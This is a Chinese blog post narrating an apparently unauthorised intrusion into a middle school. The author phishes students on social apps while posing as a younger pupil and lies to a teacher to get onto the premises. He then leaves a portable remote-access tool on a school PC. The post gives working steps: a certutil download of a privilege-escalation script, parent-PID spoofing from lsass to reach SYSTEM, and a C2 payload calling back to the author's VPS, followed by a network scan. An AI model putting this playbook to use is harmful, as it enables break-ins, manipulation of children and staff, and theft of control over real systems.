社会工程学 | 看我如何混进初中拿权限
0x01 前言
社工和攻击方一样,都是需要收集对方的信息。 踩点/打点
这个初中是我随机选的,前期做的准备工作比较久,没有用到物理黑客的设备!
0x02 踩点
如何踩点?
首先
我们确认目标的大概地点,知己知彼百战百胜,这样子在我们混进去时和混进去之后都有一定的铺垫!先 熟悉地形 ,找到自己所能 确认的摄像头 还有,重要任职老师的 姓名 , 长相 ... ...
我是如何踩点的?首先,我会有有意无意的出现在这个学校周围,比如说 路过,等人 之类的。因为在等待朋友途中,对这所学校还是有所观察的!
第二步
社交软件,对于初中生: QQ , Soul 都是他们年轻人常玩的软件,要深入了解这所学校,才能更好的进行社会工程学攻击!
Soul 通过所在的标签问答等, QQ 可以附近加人,以及通过校园墙进行钓鱼!
需要获得什么信息?
# Whoami?
钓鱼对象的任课老师姓名 班级
学校基本作息
都有哪些校长,主任 以及 年级级长,还有学生与老师的在校时间
... ...
我通过伪装学弟的身份获取信息如下:
班主任姓名:陈**
任课年级:九年级
其他科任老师:数学,美术 等
年级级长
初中部校长 ... ...
0x03 “混”
有了基本的信息,我们来混进学校 试一试 很快,冷水就泼下来了:
我 以往届师兄的身份,以回来看望学校老师的名义想进去,但是保安把我拦下,说:需要老师带进去,叫我自己打电话叫老师带你进去!
于是我从 被我钓鱼的学生那里套到了美术老师的电话
为什么是 副科老师?因为他们最不容易记住学生样貌与名字,每个学校的副科又少,基本都是一教就是大半个年级甚至是一整个年级!
因为不方便拍照,只能勉强打打字来记录一下我的这个社工过程
我成功以学生身份进来后,不能急着离开,要和美术老师寒暄夺得信任!最好是女的美术老师,比较容易从感性方向入手,抒情很重要!美术老师问了”我” 以前在学校的班主任,还有所在班级,还有班级大体都有谁,谁比较调皮捣蛋!
这是非常重要的,只有确认了基本信息,才能取得信任!这时候踩点所收集的信息就非常重要了,以及 地形 : 只有大体了解你才能不露出马脚!
在取得基本的信任后,我假装有急事,需要用电脑的前提,和她说清楚了用一会学校电脑,因为在前面寒暄我坦白了自己的接触的领域,有时候消息就需要真真假假才能让人相信。既有真诚又有谎骗!
0x04 “黑”
来到电脑室,里面有老师!我没有声张,确认彼此的信息后,他给了我一个没有学生使用比较偏僻的位置。因为我知道学校的作息,也知道电脑老师就这么一个,所以大体时间我是确认的!我自己带了U盘: 里面有绿色版的向日葵 (因为没有物理黑客的设备,勉强凑合),就硬脱时间,脱到他去叫学生上课!
... ...
把 绿色版向日葵 放在C盘下,没有关电脑,我就溜了!
0x05 “权限”
首先 登录 向日葵 ,远程控制win10 从administrator提权到system(更改父进程的pid)脚本下载
在 windows 下启动一个 administrator 权限的powershell
certutil -urlcache -split -f https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1
脚本下载后 我存放在B盘 打开cmd,输入 tasklist
找到进程 lsass.exe 这个是 system权限运行的exe ,我们记住他的pid进程号: 140 然后打开 powershell
输入
Set-ExecutionPolicy Bypass -Scope Process
./psgetsys.ps1
[MyProcess]::CreateProcessFromParent(140, "c:/windows/system32/cmd.exe", "")
一般情况下将上面命令中的140改为任意一个system权限的进程的pid即可,每台电脑的 lsass.exe 进程的 pid号皆不相同 。然后走完上面的流程会弹出cmd窗口 输入 whoami
我们便是 system
然后我的vps安装了 viper 登录我的viper
看我截图的步骤来
LHOST输入自己的vps的ip
生成载荷的端口需要和刚才创建载荷的端口一致 生成后会下载一个exe文件,我们通过向日葵上传到win10
我们上传到B盘后打开
双击打开,然后查看 viper
我们通过双击打开获得的权限只是admin的,我们可以使用刚才获得system权限的cmd窗口打开文件,也可以使用 viper 来提权
我这里演示一下viper提权
然后点击执行
它会显示获取成功
我们可以发现 我们获得了system权限
我们来查看存活主机
点击执行 需要一些时间来扫描
这么多的主机我就没有去尝试进一步了,社会工程学也点到为止!
0x06 结尾
这篇文章也算我的记录笔记,不算什么高深的技术文,不喜勿喷!点到为止,没有深入攻击!
从现在开始,星球定价125元!日后只有慢慢涨没有跌价!现在入股不亏,持续输出文章,还是小有干货的!
天堂2官方 http://www.xinzhiliao.com/sj/qiuji/26186.html- 标签:彼岸花开之夜
- 编辑:贾贵
- 相关文章
